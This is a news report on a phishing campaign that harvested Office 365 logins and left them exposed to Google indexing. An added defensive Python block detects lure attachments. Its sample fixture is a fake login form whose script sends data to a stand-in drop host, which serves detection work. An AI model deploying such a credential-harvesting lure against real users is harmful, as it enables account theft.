Hacker Error Leaves Stolen Passwords Exposed Through Google Search

Hackers who hit thousands of organizations around the world in a massive phishing campaign forgot to protect their loot and left the stolen passwords in a location Google indexed, exposing them to public searches.

The phishing campaign has been running for over six months and uses dozens of domains hosting the phishing pages. It has received constant updates to make fraudulent Microsoft Office 365 sign-in requests more realistic.

Creds in plain sight

Although it relies on simple techniques, the campaign was successful in bypassing email protection filters and collecting at least 1,000 login credentials for corporate Office 365 accounts.

Researchers from cybersecurity firms Check Point and Otorio who analyzed this campaign found that hackers exposed the stolen credentials to the public internet.

In a report released today, they explain that the attackers exfiltrated the information to domains they had registered specifically for the task. Their mistake was to put the data in a publicly visible file that Google indexed.

As a result, a Google query for a stolen email address or password could return the attackers' file in its results, as shown in the screenshot below:

Researchers from both cybersecurity companies claim that the attackers also compromised legitimate WordPress servers to host the malicious PHP page delivered to victims.

“Attackers generally prefer to use compromised servers instead of their own infrastructure due to the well-known reputation of existing websites,” the researchers explain.

By processing information from around 500 entries, the researchers were able to determine that companies in the construction, energy and IT industries were the most frequent targets of these phishing attacks.

Simple and effective phishing

Attackers used several phishing email themes to trick potential victims into loading the landing page that collected their Microsoft Office 365 username and password.

The malicious emails had the target’s first name or company title in the subject line and were supposed to provide a Xerox scan notification in HTML format.

Opening the attachment loaded a blurry image in the default web browser, overlaid with a fake Microsoft Office 365 login form. The username field is already filled in with the victim's email address, which generally lowers suspicion of credential theft.

JavaScript code running in the background checks the credentials for validity, sends them to the attacker’s drop zone server, and redirects the victim to the legitimate Office 365 login page as a distraction.
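A defender-side check for the attachment traits just described, added here as an example and not part of the original report: it flags an HTML attachment that carries a password form whose inline script or form action reaches a host other than the assumed legitimate Microsoft sign-in hosts. The sample attachment, the `drop.invalid` host and the `TRUSTED_LOGIN_HOSTS` set are constructed assumptions, not values from the campaign.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts where a genuine Office 365 form may submit credentials (an assumption for this example).
TRUSTED_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com"}
URL_RE = re.compile(r"""https?://[^\s'"<>()]+""")


class _LoginFormScanner(HTMLParser):
    """Collects the lure traits: password field, pre-filled username, and form/script URLs."""

    def __init__(self):
        super().__init__()
        self.has_password_field = False
        self.prefilled_email = None
        self.targets = set()

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "text").lower() == "password":
            self.has_password_field = True
        elif tag == "input" and "@" in a.get("value", ""):
            self.prefilled_email = a["value"]
        elif tag == "form" and a.get("action"):
            self.targets.add(a["action"])

    def handle_data(self, data):
        # Inline script bodies are delivered here; harvest every absolute URL they reference.
        self.targets.update(URL_RE.findall(data))


def scan_html_attachment(html):
    """Return (suspicious, findings); a password form reaching an untrusted host is a lure."""
    s = _LoginFormScanner()
    s.feed(html)
    hosts = {urlparse(u).hostname for u in s.targets}
    untrusted = sorted(h for h in hosts if h and h not in TRUSTED_LOGIN_HOSTS)
    findings = {"password_field": s.has_password_field,
                "prefilled_email": s.prefilled_email,
                "untrusted_hosts": untrusted}
    return s.has_password_field and bool(untrusted), findings


# Constructed sample modelled on the article's description; not a real artifact.
SAMPLE_LURE = """<html><body style="background:url(scan.png)"><form id="f">
<input type="email" name="u" value="jane.doe@example.com"><input type="password" name="p">
</form><script>document.getElementById("f").onsubmit = function () {
  fetch("https://drop.invalid/collect.php", {method: "POST"});
  location.href = "https://login.microsoftonline.com/"; };</script></body></html>"""
```

The redirect to the legitimate Microsoft host is deliberately not counted as an indicator, so only the exfiltration target trips the verdict.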

To keep the campaign under the radar, the actor used compromised email accounts to deliver the scam messages. In one attack, they impersonated the German hosting provider IONOS by 1&1.

Although this campaign began in August, researchers found phishing emails from the same threat actor dating back to May 2020.

While Google indexing the pages where hackers store stolen data is not a first, it shows that not all malicious actors are skilled enough to protect their operations. Even if they are not identified, at least their actions can be thwarted.
